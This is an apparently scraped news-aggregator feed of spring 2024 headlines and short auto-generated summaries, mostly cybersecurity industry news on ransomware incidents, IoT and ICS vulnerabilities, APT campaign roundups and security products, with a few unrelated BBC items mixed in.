    In this Help Net Security interview, Chris Peake, CISO & SVP at Smartsheet, explains how responsible AI should be defined by each organization to guide their AI development and usage. Peake emphasizes that implementing responsible AI requires balancing ethical considerations, industry regulations, and proactive risk assessment to ensure that AI is used transparently. How should businesses and governments implement responsible AI to ensure ethical alignment, particularly in industries heavily reliant on AI? Responsible AI can … More

    The post Tailoring responsible AI: Defining ethical guidelines for industry-specific use appeared first on Help Net Security.

    Autosummary: This includes: Publicly sharing your AI principles; Acknowledging the challenges you expect to encounter as you develop your AI systems; Training your employees how to comply with the principles and use AI in a responsible way; Publicly sharing exactly how your company’s AI systems work. Once you’ve taken these steps, you can start aligning AI with products and services to drive better results responsibly. Since generative AI is still relatively new and evolving, I like to take a scientific approach to this process, including documenting the facts we know today, what we expect in the future, and the subsequent outcomes. Security, IT, and governance teams, in particular, must anticipate how AI abuse can impact their organizations.


    Cow dung’s key role in India’s energy industry

    industry
    2024-05-13 https://www.bbc.com/news/articles/c254ggrry45o
    India is hoping that biogas, produced from farm waste, will curb its reliance on imported gas.

    Autosummary:


    Widely used modems in industrial IoT devices open to SMS attack

    industry
    2024-05-10 https://www.bleepingcomputer.com/news/security/widely-used-modems-in-industrial-iot-devices-open-to-sms-attack/
    Security flaws in Telit Cinterion cellular modems, widely used in sectors including industrial, healthcare, and telecommunications, could allow remote attackers to execute arbitrary code via SMS. [...]

    Autosummary: Although the research targeted the Cinterion EHS5-E series modem, because other products from the vendor have similar software and hardware architecture additional variants are also impacted: Cinterion BGS5; Cinterion EHS5/6/7; Cinterion PDS5/6/8; Cinterion ELS61/81; Cinterion PLS62. Telit fixed some of the disclosed vulnerabilities but some remain unpatched, Kaspersky told BleepingComputer.


    Regulators are coming for IoT device security

    industry
    2024-05-09 https://www.helpnetsecurity.com/2024/05/09/iot-device-security/

    Cybersecurity is a relatively new challenge for many IoT device makers who have traditionally produced non-connected devices. These devices were less vulnerable to exploitation and, as a result, manufacturers often lack the expertise and experience needed to effectively secure their connected products. IoT devices are built on a foundation of insecure software—a large portion of the open-source software and the chips used to build devices are poorly secured. Chipmakers are constantly getting caught sneaking hidden … More

    The post Regulators are coming for IoT device security appeared first on Help Net Security.

    Autosummary: While we do not yet know how aggressively regulators will enforce these new statutes, we recommend IoT manufacturers start investing in the following security features: Over-the-air (OTA) software update: The ability to update your device’s software is your escape hatch in the event a security issue is discovered after your device has shipped. Observability: Catching and fixing software bugs such as buffer overflows reinforces the security of your device, and monitoring via metrics can help you identify compromises (e.g., by spotting odd network usage patterns by a device). The device must be capable of identifying, logging, and reporting security events (e.g., compromises) to its manufacturer.


    Sumo Logic’s analytics capabilities allow security teams to find insights within their data

    industry
    2024-05-07 https://www.helpnetsecurity.com/2024/05/07/sumo-logic-security-analytics-capabilities/

    Sumo Logic announced new AI and security analytics capabilities that allow security and development teams to align around a single source of truth and collect and act on data insights more quickly. These advancements, bolstered by Sumo Logic’s free data ingest licensing, empower customers to use their critical security data to close security gaps and better fuel DevSecOps. A recent Cloud Security Alliance survey found that only 30% of respondents believe they have good collaboration … More

    The post Sumo Logic’s analytics capabilities allow security teams to find insights within their data appeared first on Help Net Security.

    Autosummary: “We’re excited to deliver new security innovations leveraging AI and deeper threat intelligence, all wrapped around our new Flex Licensing model – removing the economic and collaboration barriers by ingesting, storing and analyzing all security log events in the Sumo Logic SaaS Log Analytics Platform, so Dev, Sec and Ops teams have a single place to monitor and secure their apps and infrastructure,” added Kim. New capabilities include: New integrated threat intelligence: By integrating an out-of-the-box threat intelligence feed and third-party feeds with security log data, Sumo Logic is strengthening security postures and providing earlier threat detection.


    How to prepare for the CISSP exam: Tips from industry leaders

    industry
    2024-05-06 https://www.helpnetsecurity.com/2024/05/06/how-to-cissp-exam-prep/

    The Certified Information Systems Security Professional (CISSP) is the most widely recognized certification in the information security industry. CISSP certifies that an information security professional possesses extensive technical and managerial expertise for designing, engineering, and managing an organization’s security stance. In this article, CISSP-certified cybersecurity leaders provide practical tips and strategies to help candidates navigate the extensive study requirements and effectively manage their CISSP exam prep time. Whether you’re just starting your study journey or … More

    The post How to prepare for the CISSP exam: Tips from industry leaders appeared first on Help Net Security.

    Autosummary: Even though I had over five years of experience in cybersecurity and over ten years in IT, my practical knowledge was only in specific domains (i.e. Security and Risk Management, Asset Security, Communications and Network Security, etc.). Looking back at the exam itself, I believe that having a strong knowledge foundation, coupled with real-life experience, and a network of colleagues you can always turn to and discuss certain topics you are less familiar with, is the key to success in passing the CISSP exam. Now, this may all sound easy, but the truth is that by the time I decided to pursue the CISSP, I already had 13 years of experience, numerous other industry certifications, and had been deeply involved in the cybersecurity field since the day I graduated; my Master’s thesis was also in cybersecurity. Ryan Williams Sr., IT Security Analyst, Buddobot: Here’s how I effectively studied for the CISSP certification, relying solely on comprehensive study materials rather than quick-fix dumps or quizlets. Shannon Brewster, Executive Director, General Manager, AT&T Cybersecurity: Passing the CISSP exam is an ambitious goal, especially if you hope to pass on your first attempt. Andrea Szeiler-Zengo, President of the Women4Cyber Hungarian Chapter: When I decided to get CISSP certified, I signed up for local training, but honestly, I learned more independently than in class. This structured approach to studying for the CISSP took approximately 6 months, using a mix of reading, practical exercises, and motivational content, and equipped me with the knowledge and confidence to successfully pass the exam.


    From likes to votes: How influencers are changing Indian politics

    industry
    2024-05-04 https://www.bbc.co.uk/news/world-asia-india-68920953
    Politicians are roping in influencers to woo voters like never before. But is this a good thing?

    Autosummary:


    Expert-Led Webinar - Uncovering Latest DDoS Tactics and Learn How to Fight Back

    industry
    2024-05-03 https://thehackernews.com/2024/05/expert-led-webinar-learn-latest-ddos.html
    In today’s rapidly evolving digital landscape, the threat of Distributed Denial of Service (DDoS) attacks looms more significant than ever. As these cyber threats grow in sophistication, understanding and countering them becomes crucial for any business seeking to protect its online presence. To address this urgent need, we are thrilled to announce our upcoming webinar, "Uncovering Contemporary

    Autosummary: What You Will Learn: Understanding the Threat: Explore the escalated risks DDoS attacks pose to your business, including recent advancements in attack strategies like IoT botnets and amplification tactics.


    How the computer games industry is embracing AI

    industry
    2024-05-02 https://www.bbc.co.uk/news/business-68844761
    Developing computer games can be wildly expensive so some hope that AI can cut the cost.

    Autosummary:


    Why the automotive sector is a target for email-based cyber attacks

    industry
    2024-04-30 https://www.helpnetsecurity.com/2024/04/30/automotive-email-compromise-attacks-video/

    While every organization across every vertical is at risk of advanced email attacks, certain industries periodically become the go-to target for threat actors. In this Help Net Security video, Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new most popular target for business email compromise and vendor email compromise attacks. The automotive industry is currently being targeted by cybercriminals who are launching business email compromise (BEC) and vendor email … More

    The post Why the automotive sector is a target for email-based cyber attacks appeared first on Help Net Security.

    Autosummary:


    UK enacts IoT cybersecurity law

    industry ciber
    2024-04-29 https://www.helpnetsecurity.com/2024/04/29/uk-enacts-iot-cybersecurity-law/

    The Product Security and Telecommunications Infrastructure (PSTI) Act has come into effect today, requiring manufacturers of consumer-grade IoT products sold in the UK to stop using guessable default passwords and have a vulnerability disclosure policy. “Most smart devices are manufactured outside the UK, but the PSTI act also applies to all organisations importing or retailing products for the UK market. Failure to comply with the act is a criminal offence, with fines up to £10 … More

    The post UK enacts IoT cybersecurity law appeared first on Help Net Security.

    Autosummary: About the legislation: The PSTI Act covers internet- and network-connectable products, including “smart”: TVs, streaming devices, speakers; Games consoles, smartphones, tablets; Base stations and hubs; Home automation and alarm systems; “Wearables”: smart watches, fitness trackers, etc.


    Sweden’s liquor supply severely impacted by ransomware attack on logistics company

    exploits ransomware industry
    2024-04-26 https://securityaffairs.com/162333/cyber-crime/swedens-liquor-supply-ransomware-attack.html
    A ransomware attack on a Swedish logistics company Skanlog severely impacted the country’s liquor supply. Skanlog, a critical distributor for Systembolaget, the Swedish government-owned retail chain, suffered a ransomware attack. Systembolaget has a monopoly on the sale of alcoholic beverages containing more than 3.5% alcohol by volume. It operates stores across Sweden and is responsible […]

    Autosummary: Sweden’s liquor supply severely impacted by ransomware attack on logistics company. Pierluigi Paganini, April 26, 2024. A ransomware attack on a Swedish logistics company Skanlog severely impacted the country’s liquor supply.


    Tevez "satisfactory" in hospital after chest pains

    industry
    2024-04-24 https://www.bbc.com/sport/football/articles/c51n7ny9d1no
    Former West Ham, Manchester United and Manchester City striker Carlos Tevez is admitted to hospital after suffering chest pains.

    Autosummary:


    Microsoft pulls fix for Outlook bug behind ICS security alerts

    exploits industry
    2024-04-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-pulls-fix-for-outlook-bug-unexpected-ICS-warnings-after-December-security-updates/
    Microsoft reversed the fix for an Outlook bug causing erroneous security warnings after installing December 2023 security updates [...]

    Autosummary:


    Fuxnet malware: Growing threat to industrial sensors

    exploits industry
    2024-04-22 https://www.helpnetsecurity.com/2024/04/22/fuxnet-malware-video/

    In this Help Net Security video, Sonu Shankar, Chief Strategy Officer at Phosphorus, discusses how Blackjack’s Fuxnet malware should be a wakeup call to industrial operators about the vulnerability of sensor networks and the outsized impact these attacks can have on critical operations.

    The post Fuxnet malware: Growing threat to industrial sensors appeared first on Help Net Security.

    Autosummary:


    Russian Hacker Group ToddyCat Uses Advanced Tools for Industrial-Scale Data Theft

    industry rusia-ucrania
    2024-04-22 https://thehackernews.com/2024/04/russian-hacker-group-toddycat-uses.html
    The threat actor known as ToddyCat has been observed using a wide range of tools to retain access to compromised environments and steal valuable data. Russian cybersecurity firm Kaspersky characterized the adversary as relying on various programs to harvest data on an "industrial scale" from primarily governmental organizations, some of them defense related, located in

    Autosummary:


    FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor

    industry
    2024-04-18 https://thehackernews.com/2024/04/fin7-cybercrime-group-targeting-us-auto.html
    The infamous cybercrime syndicate known as FIN7 has been linked to a spear-phishing campaign targeting the U.S. automotive industry to deliver a known backdoor called Carbanak (aka Anunak). "FIN7 identified employees at the company who worked in the IT department and had higher levels of administrative rights," the BlackBerry research and intelligence team said in a new write-up. "They

    Autosummary:


    GuidePoint Security introduces IoT Security Assessment

    industry
    2024-04-16 https://www.helpnetsecurity.com/2024/04/16/guidepoint-security-iot-security-assessment/

    GuidePoint Security announced its IoT Security Assessment, a new cybersecurity service. GuidePoint Security’s team of IoT security and embedded systems experts have extensive experience identifying potential weaknesses in IoT devices and applications across a wide range of industries. Organizations that leverage GuidePoint’s targeted IoT Security Assessment can ultimately identify and fix vulnerabilities, fortify their defenses, inspire confidence in their customers, and prevent unwanted access to their IoT ecosystem. “IoT devices are prevalent in many industries, … More

    The post GuidePoint Security introduces IoT Security Assessment appeared first on Help Net Security.

    Autosummary: “IoT devices are prevalent in many industries, yet the risks associated with them are often underestimated or overlooked, leaving many organizations and their IT systems vulnerable to potential threats,” said Victor Wieczorek, VP of Application Security and Threat & Attack Simulation, GuidePoint Security.


    Ukrainian Blackjack group used ICS malware Fuxnet against Russian targets

    exploits industry rusia-ucrania
    2024-04-15 https://securityaffairs.com/161865/hacking/blackjack-ics-malware-fuxnet.html
    The Ukrainian hacking group Blackjack used a destructive ICS malware dubbed Fuxnet in attacks against Russian infrastructure. Industrial and enterprise IoT cybersecurity firm Claroty reported that the Ukrainian Blackjack hacking group claims to have damaged emergency detection and response capabilities in Moscow and beyond the Russian capital using a destructive ICS malware dubbed Fuxnet. The […]

    Autosummary: “The attackers developed and deployed malware that targeted the gateways and deleted filesystems, directories, disabled remote access services, routing services for each device, and rewrote flash memory, destroyed NAND memory chips, UBI volumes and other actions that further disrupted operation of these gateways,” concludes the report. “However, our analysis of data leaked by Blackjack, including the Fuxnet malware, indicates that only a little more than 500 sensor gateways were bricked by the malware in the attack, and the remote sensors and controllers likely remain intact,” reads the analysis published by Claroty.


    Why women struggle in the cybersecurity industry

    industry ciber
    2024-04-12 https://www.helpnetsecurity.com/2024/04/12/women-cybersecurity-workplace-experiences/

    The workplace experiences of women in cybersecurity are dramatically worse than men across virtually every category, according to a WiCyS and Aleria survey. Previous studies have illustrated that the representation of women in cybersecurity is much lower than it should be, but can’t explain why or how we can improve matters. Women confront exclusion at higher rates Women encounter exclusion at twice the rate of men, signaling a pressing need for industry-wide cultural and procedural … More

    The post Why women struggle in the cybersecurity industry appeared first on Help Net Security.

    Autosummary: Top four categories of exclusion: The top four categories of exclusion faced by women are respect, career and growth, access and participation, and recognition, signaling critical intervention points.


    Optics giant Hoya hit with $10 million ransomware demand

    exploits ransomware industry
    2024-04-11 https://www.bleepingcomputer.com/news/security/optics-giant-hoya-hit-with-10-million-ransomware-demand/
    A recent cyberattack on Hoya Corporation was conducted by the "Hunters International" ransomware operation, which demanded a $10 million ransom for a file decryptor and not to release files stolen during the attack. [...]

    Autosummary: Hunters International is a Ransomware-as-a-Service (RaaS) operation that emerged in mid-2023, whose encryptor shares code with the Hive ransomware operation, indicating a possible rebrand.


    Venezuela’s ex-oil minister reappears - in handcuffs

    industry
    2024-04-10 https://www.bbc.co.uk/news/world-latin-america-68779090
    Tareck El Aissami, a former close ally of President Maduro, has been arrested on corruption charges.

    Autosummary:


    How can the energy sector bolster its resilience to ransomware attacks?

    exploits ransomware industry
    2024-04-08 https://www.helpnetsecurity.com/2024/04/08/energy-sector-attacks-resilience/

    Since it plays a vital role in every functioning society, the energy sector has always been a prime target for state-backed cybercriminals. The cyber threats targeting this industry have grown significantly in recent years, as geopolitical tensions have fueled an increase in state-sponsored cyber espionage. According to one report on OT/ICS cyber security incidents, the energy sector recorded 39% of all attacks, with nearly 60% of these attacks attributed to state-affiliated groups. As well as … More

    The post How can the energy sector bolster its resilience to ransomware attacks? appeared first on Help Net Security.

    "

    Autosummary: Moreover, energy providers still rely on ageing OT assets like industrial control systems (ICS), supervisory control and data acquisition (SCADA) systems, and programmable logic controllers (PLCs). The critical threat of ransomware. In 2023, we saw an increase in ransomware attacks against the energy industry including nuclear, oil, and gas facilities. "


    Industrial sectors embrace zero trust for enhanced security

    industry
    2024-04-08 https://www.helpnetsecurity.com/2024/04/08/ot-environments-zero-trust-implementation/

    Organizations are leveraging zero trust to enhance the safety, security, and reliability of their enterprise across IT and OT environments, according to Xage Security. Zero trust security implementation in industrial sectors. The report analyzes the current status and trajectory of zero trust security implementation within industrial organizations, specifically focusing on critical infrastructure and manufacturing sectors. The growing and evolving threat landscape has elevated cybersecurity to a top priority for infrastructure operators across the globe. New … More

    The post Industrial sectors embrace zero trust for enhanced security appeared first on Help Net Security.

    "

    Autosummary: “While zero trust is not a one-size-fits-all model, the data shows that organizations are evolving their understanding of zero trust as a strategy to enhance the safety, security, and reliability of both their enterprise IT and OT environments,” said Jonathon Gordon, Industry Analyst at Takepoint Research. "


    Veriato introduces AI-driven predictive behavior analytics platform

    industry
    2024-04-08 https://www.helpnetsecurity.com/2024/04/08/veriato-irm/

    Veriato released their next generation Insider Risk Management (IRM) solution. With organizations of all sizes facing a more complex cybersecurity environment, Veriato IRM delivers flexibility and scalability using the power of GenAI. Veriato’s IRM solution offers technology for companies looking to improve their threat mitigation with AI enabled predictive analytics delivering better detection and predictability. According to IBM, the average cost of a single data breach has reached $4.45 million, a record high. Organizations need … More

    The post Veriato introduces AI-driven predictive behavior analytics platform appeared first on Help Net Security.

    "

    Autosummary: “We are extremely excited to build upon our history as the category creator, and provide a new layer of control, transparency, confidence and perhaps most importantly, proactivity,” added Harz. "


    Boom times for US green energy as federal cash flows in

    industry
    2024-04-08 https://www.bbc.co.uk/news/business-68667140
    The US government has directed unprecedented sums of money at green energy projects. "

    Autosummary: "


    New Phishing Campaign Targets Oil & Gas with Evolved Data-Stealing Malware

    financial exploits industry
    2024-04-04 https://thehackernews.com/2024/04/new-phishing-campaign-targets-oil-gas.html
    An updated version of an information-stealing malware called Rhadamanthys is being used in phishing campaigns targeting the oil and gas sector. "The phishing emails use a unique vehicle incident lure and, in later stages of the infection chain, spoof the Federal Bureau of Transportation in a PDF that mentions a significant fine for the incident," Cofense researcher Dylan Duncan said. The "

    Autosummary: "The main actor [Bignosa] appears to be a part of a group operating malware and phishing campaigns, targeting organizations, which is testified by the US and Australian email business databases, as well as individuals," the Israeli cybersecurity company said. "


    Hoya’s optics production and orders disrupted by cyberattack

    industry ciber
    2024-04-04 https://www.bleepingcomputer.com/news/security/hoyas-optics-production-and-orders-disrupted-by-cyberattack/
    Hoya Corporation, one of the largest global manufacturers of optical products, says a "system failure" caused servers at some of its production plants and business divisions to go offline on Saturday. [...] "

    Autosummary: "


    Cyber attacks on critical infrastructure show advanced tactics and new capabilities

    industry
    2024-04-03 https://www.helpnetsecurity.com/2024/04/03/marty-edwards-tenable-critical-infrastructure-systems-cybersecurity/

    In this Help Net Security interview, Marty Edwards, Deputy CTO OT/IoT at Tenable, discusses the impact of geopolitical tensions on cyber attacks targeting critical infrastructure. Edwards highlights the need for collaborative efforts between policymakers, government agencies, and the private sector to strengthen cybersecurity across critical infrastructure sectors. He emphasizes investment in personnel, technology, and proactive measures. How have recent political unrest and geopolitical tensions influenced the frequency and nature of cyber attacks on critical infrastructure? … More

    The post Cyber attacks on critical infrastructure show advanced tactics and new capabilities appeared first on Help Net Security.

    "

    Autosummary: And inadequate cyber hygiene practices, such as default passwords and lack of authentication security, pose significant risks to critical infrastructure, particularly in sectors like water facilities. "


    Google fixes two Pixel zero-day flaws exploited by forensics firms

    exploits industry
    2024-04-03 https://www.bleepingcomputer.com/news/security/google-fixes-two-pixel-zero-day-flaws-exploited-by-forensics-firms/
    Google has fixed two Google Pixel zero-days exploited by forensic firms to unlock phones without a PIN and gain access to the data stored within them. [...] "

    Autosummary: "CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to support unlocking/flashing/locking," explained GrapheneOS via a thread on X. "Forensic companies are rebooting devices in "After First Unlock" state into fastboot mode on Pixels and other devices to exploit vulnerabilities there and then dump memory. "


    Why AI forensics matters now

    industry
    2024-04-02 https://www.helpnetsecurity.com/2024/04/02/ai-forensics-video/

    In this Help Net Security video, Sylvia Acevedo, who serves on the Boards of Qualcomm and Credo, discusses why companies should invest in forensic capabilities and why forensics will be such an important topic as AI continues to be integrated into infrastructures and workflows. In an era where AI is becoming increasingly integral to business operations, the lack of comprehensive education and training in AI forensics poses a significant threat. This gap leaves organizations vulnerable … More

    The post Why AI forensics matters now appeared first on Help Net Security.

    "

    Autosummary: "


    APT and financial attacks on industrial organizations in H2 2023

    financial industry
    2024-04-02 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-h2-2023/
    An overview of reports of APT and financial attacks on industrial enterprises, as well as related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities "

    Autosummary: CISA alert on LockBit 3.0 ransomware. On November 21, 2023, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) released a joint alert that disseminates Indicators of Compromise (IOCs), Tactics, Techniques and Procedures (TTPs), and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.

    CISA alert on Star Blizzard. In a joint advisory published on December 7, the “Five Eyes” security agencies (the Cybersecurity and Infrastructure Security Agency (CISA) in coordination with the United Kingdom’s National Cyber Security Centre (UK-NCSC), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NCSC-NZ), and the U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), and Cyber Command Cyber National Mission Force (CNMF)) warned about the evolving phishing techniques employed by Star Blizzard and its targeting of individuals and organizations, including the U.S. government and defense industrial base. The group uses both well-known classic credential access tools and custom applications: Bughatch, Burntcigar, Cobeacon, Hancitor (Chanitor), Termite, SystemBC, Veeamp, Wedgecut, RomCOM RAT, Mimikatz, PowerShell, PsExec, and Remote Desktop Protocol.

    Since March, Microsoft researchers have observed phishing attacks by TA422 (aka APT28, Forest Blizzard, Strontium, Fancy Bear, and Fighting Ursa) targeting government, energy, transportation, and non-governmental organizations in the U.S., Europe, and the Middle East. TEMP.Hex is targeting a variety of sectors, including construction and engineering, business services, government, health, transportation, and retail organizations in Europe, Asia, and the U.S. Another threat actor tracked as UNC4698 is also using USB drives to spread the SnowyDrive malware, which creates a backdoor on infected systems, providing attackers a way to remotely interact with the device and issue commands. This group, which typically targets logistics, government, and financial sectors in India and Israel (and, to a lesser extent, in Australia, Senegal, the Netherlands, Sweden, and Ethiopia), has been linked to more than 750 DDoS attacks and 78 website defacements since June 2022.

    CISA alert on Rhysida ransomware. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint alert that provides defenders with Rhysida Ransomware indicators of compromise (IOCs), detection information, and tactics, techniques, and procedures (TTPs) discovered during investigations as of September 2023. The group used a new backdoor named Sponsor to target organizations in Brazil, Israel, and the UAE: the targeted entities include automotive, manufacturing, engineering, financial services, media, healthcare, technology, and telecoms sectors.

    In a joint advisory published on December 13, the FBI, the Cybersecurity & Infrastructure Security Agency (CISA), the NSA, the Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK National Cyber Security Centre (NCSC) warned that APT29 has been exploiting an authentication bypass vulnerability (CVE-2023-42793) in TeamCity. Cuba targeted organizations in the U.S., Canada, Australia, and Europe with a series of high-profile attacks on oil companies, manufacturing, financial services, government agencies, healthcare providers, and others. LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Over the past year, at least 16 organizations in Russia and one (a ministry) in Serbia have become victims, including state and educational institutions, enterprises of the aviation, rocket-space, and agricultural industries, the military‑industrial and fuel-energy complex, and infosec companies. Athena comes loaded with features such as cross-platform support for Windows, Linux, and OSX, SOCKS5 support, reverse port forwarding, reflective loading of assemblies, modular loading of commands, and much more.

    OilRig attacks. ESET researchers analyzed a series of new OilRig (aka APT34, Lyceum, Crambus, or Siamesekitten) downloaders that the threat actor used in 2022 campaigns to target organizations in Israel, including a healthcare organization, a manufacturing company, and a local governmental body. The new downloaders, named SampleCheck5000 (SC5k v1-v3), OilCheck, ODAgent, and OilBooster, are notable for using legitimate cloud storage and cloud‑based email services for C2 communications and data exfiltration as a way to hide malicious communication and mask the group’s network infrastructure: Microsoft OneDrive, Exchange Online and Office 365 via Microsoft Graph and Outlook API, as well as Microsoft Office Exchange Web Services (EWS). Top organizations were in manufacturing, insurance, technology, and financial services, which received 15%, 9%, 7%, and 6% of the emails, respectively.

    Imperial Kitten/Yellow Liderc/Tortoiseshell attacks. According to PwC researchers, threat actor Yellow Liderc (aka Imperial Kitten, Tortoiseshell, TA456, and Crimson Sandstorm) has launched watering-hole attacks to distribute IMAPLoader malware, which exploits Windows utilities to identify target systems and deploy additional payloads. Observed as a Ransomware-as-a-Service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors since May 2023, and any ransom paid is split between the group and affiliates. According to Proofpoint researchers, TA422 used the vulnerabilities as initial access against government, aerospace, education, finance, manufacturing, and technology sector targets likely to either disclose user credentials or initiate follow-on activity.

    At least 20 Russian organizations have been affected, most of which are in the public sector, information technology, space industry and energy sector, but also including construction, transportation, and logistics companies. The majority of affected entities are directly involved in defense manufacturing, encompassing radar systems, unmanned aerial vehicles (UAVs), military vehicles, vessels, weaponry, and companies related to the navy.

    APT29/Midnight Blizzard/Nobelium attacks. Microsoft researchers report that Midnight Blizzard (aka Nobelium) has been using Microsoft Teams chats to target individuals in government, NGOs, IT services, technology, discrete manufacturing, and media sectors. The group’s activity began in February 2023 and continued until at least May 2023, stealing sensitive information from manufacturing, IT, and biomedical companies in Taiwan, as well as victims in the U.S., Vietnam, and Pacific Islands. Among those compromised were large companies in the field of communications, information security and IT, technology centers, universities and research institutes engaged in advanced developments and technologies, pharmaceutical companies, defense enterprises, and financial organizations.

    CISA alert on CyberAv3ngers attacks. The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), NSA, EPA, and Israel’s National Cyber Directorate published a joint Cybersecurity Advisory (CSA) on December 14 on the threat actor calling itself CyberAv3ngers, responsible for the attack on the Municipal Water Authority of Aliquippa in Pennsylvania.

    Ballistic Bobcat/Charming Kitten attacks. ESET researchers uncovered a sophisticated cyber-espionage campaign carried out by suspected Iranian-aligned threat actor Ballistic Bobcat (aka APT35, APT42, Charming Kitten, TA453, and PHOSPHORUS). "


    Escalating malware tactics drive global cybercrime epidemic

    exploits industry
    2024-04-01 https://www.helpnetsecurity.com/2024/04/01/q4-2023-malware-rise/

    Evasive, basic, and encrypted malware all increased in Q4 2023, fueling a rise in total malware, according to WatchGuard. Threat actors employ diverse tactics. The average malware detections rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific. “The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities … More

    The post Escalating malware tactics drive global cybercrime epidemic appeared first on Help Net Security.

    "

    Autosummary: A malware-as-a-service (MaaS), Glupteba’s malicious capabilities include downloading additional malware, masquerading as a botnet, stealing sensitive information, and mining cryptocurrency with tremendous stealth. "


    Facebook spied on Snapchat users to get analytics about the competition

    industry
    2024-03-28 https://www.malwarebytes.com/blog/news/2024/03/facebook-spied-on-snapchat-users-to-get-analytics-about-the-competition
    Facebook is accused of using potentially criminal methods to spy on Snapchat users to gain a commercial advantage over its competition. "

    Autosummary: “Whenever someone asks a question about Snapchat, the answer is usually that because their traffic is encrypted we have no analytics about them. . . . "


    Ransomware as a Service and the Strange Economics of the Dark Web

    exploits industry
    2024-03-27 https://www.bleepingcomputer.com/news/security/ransomware-as-a-service-and-the-strange-economics-of-the-dark-web/
    Ransomware is quickly changing in 2024, with massive disruptions and large gangs shutting down. Learn from Flare how affiliate competition is changing in 2024, and what might come next. [...] "

    Autosummary: Ransomware Groups and Affiliates: A Complex Supply Chain. As the cybercrime ecosystem has grown, it’s also grown more complex, with many different actors carrying out individual legs of a complex supply chain. This has led to a highly competitive ecosystem, in which the largest ransomware groups try to offer potential affiliates a larger share of successful ransoms and fewer restrictions than other groups as a play to win the most sophisticated affiliates. [Figure: LockBit’s Affiliate Rules page] Giving affiliates the hard work of executing successful attacks allows the groups to scale much faster and compromise many more victims than would otherwise be possible, while also enabling the groups to continue to innovate on their ransomware code. "


    Hackers Hit Indian Defense, Energy Sectors with Malware Posing as Air Force Invite

    exploits industry
    2024-03-27 https://thehackernews.com/2024/03/hackers-target-indian-defense-and.html
    Indian government entities and energy companies have been targeted by unknown threat actors with an aim to deliver a modified version of an open-source information stealer malware called HackBrowserData and exfiltrate sensitive information in some cases by using Slack as command-and-control (C2). "The information stealer was delivered via a phishing email, masquerading as an invitation letter "

    Autosummary: The attack chain starts with a phishing message containing an ISO file ("invite.iso"), which, in turn, contains a Windows shortcut (LNK) that triggers the execution of a hidden binary ("scholar.exe") present within the mounted optical disk image. "


    Tech industry’s focus on innovation leaves security behind

    industry
    2024-03-26 https://www.helpnetsecurity.com/2024/03/26/technology-companies-cyber-threats/

    The rapid digital transformation and technological progress within the technology sector have enlarged the attack surface for companies operating in this space, according to Trustwave. As the sector evolves, the proliferation of Software-as-a-Service (SaaS) providers, cloud infrastructure, and internet-connected systems and devices continue to grow. This growth often occurs at a rate that outstrips the deployment of adequate security measures, such as the inability to keep track of and remediate vulnerabilities, which exposes the company … More

    The post Tech industry’s focus on innovation leaves security behind appeared first on Help Net Security.

    "

    Autosummary: As the sector evolves, the proliferation of Software-as-a-Service (SaaS) providers, cloud infrastructure, and internet-connected systems and devices continue to grow.Even a minor security breach can cripple a company and cause cascading disruptions across the vital systems we rely on, including internal business operations, customer-trusted software and products, and the infrastructure supporting supply chains. "


    Watch ‘devils’ whip Catholics in Easter tradition

    industry
    2024-03-26 https://www.bbc.co.uk/news/world-latin-america-68662739
    Men dressed as devils - "talciguines" - whip the faithful in a playful Easter tradition in El Salvador. "

    Autosummary: "


    Malicious NuGet Package Linked to Industrial Espionage Targets Developers

    industry
    2024-03-26 https://thehackernews.com/2024/03/malicious-nuget-package-linked-to.html
    Threat hunters have identified a suspicious package in the NuGet package manager that's likely designed to target developers working with tools made by a Chinese firm that specializes in industrial- and digital equipment manufacturing. The package in question is SqzrFramework480, which ReversingLabs said was first published on January 24, 2024. It has been downloaded  "

    Autosummary: " Present within the library is a DLL file "SqzrFramework480.dll" that comes with features to take screenshots, ping a remote IP address after every 30 seconds until the operation is successful, and transmit the screenshots over a socket created and connected to said IP address. "


    CISA: Here’s how you can foil DDoS attacks

    industry
    2024-03-22 https://www.helpnetsecurity.com/2024/03/22/guidance-ddos-attacks/

    In light of the rise of “DDoS hacktivism” and the recent DDoS attacks aimed at disrupting French and Alabama government websites, the Cybersecurity and Infrastructure Security Agency (CISA) has updated its guidance on how governmental entities (but also other organizations) should respond to this type of attack. DDoS attacks explained. First and foremost, the document explains the main difference between a DoS attack (from a single source) and a DDoS attack (from multiple sources). “The … More

    The post CISA: Here’s how you can foil DDoS attacks appeared first on Help Net Security.

    "

    Autosummary: "


    Fears of hunger as Haiti turmoil spreads

    industry
    2024-03-21 https://www.bbc.co.uk/news/world-latin-america-68622814
    Millions are caught in a perfect storm of politics, violence and homelessness, reports the BBC's Will Grant. "

    Autosummary: "


    Regulatory measures boost cybersecurity industry

    industry ciber
    2024-03-20 https://www.helpnetsecurity.com/2024/03/20/regulatory-measures-cybersecurity-industry/

